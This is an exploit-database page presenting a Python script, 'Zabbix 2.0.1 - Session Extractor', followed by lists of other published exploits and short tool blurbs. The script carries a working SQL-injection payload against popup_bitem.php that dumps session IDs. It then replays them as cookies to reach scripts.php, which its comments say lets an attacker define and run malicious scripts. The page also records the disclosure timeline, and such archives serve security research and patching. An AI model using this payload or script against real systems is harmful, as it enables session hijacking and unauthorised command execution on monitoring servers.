Menu

Search for hundreds of thousands of exploits

"Zabbix 2.0.1 - Session Extractor"

Author

Exploit author

muts

Platform

Exploit platform

php

Release date

Exploit published date

2012-07-24

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
#!/usr/bin/python

import re
import sys,urllib2,urllib

print "\n[*] Zabbix 2.0.1 Session Extractor 0day"
print "[*] http://www.offensive-security.com"
print "##################################\n"

''' 

The sessions found by this tool may allow you to access the scripts.php file.
Through this web interface, an administrator can define new malicious scripts. 
These scripts can then be called from the maps area, and executed with "zabbix" permissions.

Timeline:

17 Jul 2012: Vulnerabilty reported
17 Jul 2012: Reply received
18 Jul 2012: Issue opened: https://support.zabbix.com/browse/ZBX-5348
19 Jul 2012: Fixed for inclusion in version 2.0.2

'''

ip="172.16.164.150"

target = 'http://%s/zabbix/popup_bitem.php' % ip
url = 'http://%s/zabbix/scripts.php' % ip

def sendSql(num):
        global target
        payload="1)) union select 1,group_concat(sessionid) from sessions where userid='%s'#" % num
        payload="1 union select 1,1,1,1,1,group_concat(sessionid),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from sessions where userid='%s'#" % num
        values = {'dstfrm':'1','itemid':payload }
        url = "%s?%s" % (target, urllib.urlencode(values))  
        req = urllib2.Request(url)                          
        response = urllib2.urlopen(req)                 
        data = response.read()                  
        return data

def normal(cookie):
	global url
        req = urllib2.Request(url)
        cook = "zbx_sessionid=%s" %cookie
        req.add_header('Cookie', cook)
        response = urllib2.urlopen(req)                 
        data = response.read()                  
        if re.search('ERROR: Session terminated, re-login, please',data) or re.search('You are not logged in',data) or re.search('ERROR: No Permissions',data):
                return "FAIL"
        else:
                return "SUCCESS"

sessions=[]

for m in range(1,2):
	print "[*] Searching sessions belonging to id %s" % m
        hola=sendSql(m)
        for l in re.findall(r"([a-fA-F\d]{32})", hola):
		if l not in sessions:
			sessions.append(l)
	                print "[*] Found sessionid %s - %s" % (l,normal(l))
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "WonderCMS 3.1.3 - 'Menu' Persistent Cross-Site Scripting" webapps php "Hemant Patidar"
2020-12-02 "WordPress Plugin Wp-FileManager 6.8 - RCE" webapps php "Mansoor R"
2020-12-02 "WonderCMS 3.1.3 - Authenticated Remote Code Execution" webapps php zetc0de
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - Password Reset leading to Account Takeover" webapps php "Mufaddal Masalawala"
2020-12-02 "Simple College Website 1.0 - 'page' Local File Inclusion" webapps php Mosaaed
2020-12-02 "Car Rental Management System 1.0 - SQL Injection / Local File include" webapps php Mosaaed
2020-12-02 "WonderCMS 3.1.3 - Authenticated SSRF to Remote Remote Code Execution" webapps php zetc0de
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Pharmacy Store Management System 1.0 - 'id' SQL Injection" webapps php "Aydın Baran Ertemir"
2020-12-01 "Multi Restaurant Table Reservation System 1.0 - Multiple Persistent XSS" webapps php yunaranyancat
Release Date Title Type Platform Author
2019-04-08 "QNAP Netatalk < 3.1.12 - Authentication Bypass" remote multiple muts
2012-08-08 "IBM Proventia Network Mail Security System 2.5 - POST File Read" webapps windows muts
2012-07-24 "Zabbix 2.0.1 - Session Extractor" webapps php muts
2012-07-24 "Symantec Web Gateway 5.0.3.18 - 'pbcontrol.php' Root Remote Code Execution" remote linux muts
2012-07-24 "Symantec Web Gateway 5.0.3.18 - Local/Remote File Inclusion / Remote Command Execution" webapps linux muts
2012-07-23 "Symantec Web Gateway 5.0.3.18 - Blind SQL Injection Backdoor via MySQL Triggers" webapps php muts
2012-07-23 "Alienvault Open Source SIEM (OSSIM) 3.1 - Reflected Cross-Site Scripting / Blind SQL Injection" webapps php muts
2012-07-23 "Symantec Web Gateway 5.0.2 - 'blocked.php?id' Blind SQL Injection" webapps linux muts
2012-07-22 "Dell SonicWALL Scrutinizer 9.0.1 - 'statusFilter.php?q' SQL Injection" webapps php muts
2012-07-22 "ipswitch whatsup gold 15.02 - Persistent Cross-Site Scripting / Blind SQL Injection / Remote Code Execution" webapps asp muts
2012-07-21 "SolarWinds Orion Network Performance Monitor 10.2.2 - Multiple Vulnerabilities" webapps windows muts
2012-07-21 "X-Cart Gold 4.5 - 'products_map.php?symb' Cross-Site Scripting" webapps php muts
2012-07-21 "AtMail Email Server Appliance 6.4 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Remote Code Execution" remote linux muts
2012-05-26 "Symantec Web Gateway 5.0.2 - Local/Remote File Inclusion / Remote Code Execution" webapps linux muts
2012-05-01 "SolarWinds Storage Manager 5.1.0 - Remote SYSTEM SQL Injection" remote windows muts
2012-03-23 "FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution" webapps php muts
2010-07-06 "Sun Java Web Server 7.0 u7 - Admin Interface Denial of Service" dos windows muts
2009-09-01 "Microsoft IIS 5.0 FTP Server (Windows 2000 SP4) - Remote Stack Overflow" remote windows muts
2008-12-10 "Microsoft Internet Explorer (Windows Vista) - XML Parsing Buffer Overflow" remote windows muts
2008-07-12 "Fonality trixbox 2.6.1 - 'langChoice' Remote Code Execution (Python)" remote linux muts
2008-04-18 "DivX Player 6.6.0 - '.srt' File Buffer Overflow (SEH)" local windows muts
2008-04-02 "Mcafee EPO 4.0 - 'FrameworkService.exe' Remote Denial of Service" dos windows muts
2008-04-02 "HP OpenView Network Node Manager (OV NNM) 7.5.1 - 'OVAS.exe' Overflow (SEH)" remote windows muts
2008-04-02 "Novel eDirectory HTTP - Denial of Service" dos windows muts
2008-03-26 "PacketTrap Networks pt360 2.0.39 TFTPD - Remote Denial of Service" dos windows muts
2008-03-26 "TFTP Server 1.4 - ST Buffer Overflow" remote windows muts
2008-03-26 "Quick TFTP Server Pro 2.1 - Remote Overflow (SEH)" remote windows muts
2007-12-12 "HP OpenView Network Node Manager 07.50 - CGI Remote Buffer Overflow" remote windows muts
2007-11-26 "Apple QuickTime 7.2/7.3 (Internet Explorer 7 / Firefox / Opera) - RTSP Response Universal" remote windows muts
2007-10-27 "IBM Tivoli Storage Manager 5.3 - Express CAD Service Buffer Overflow" remote windows muts 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected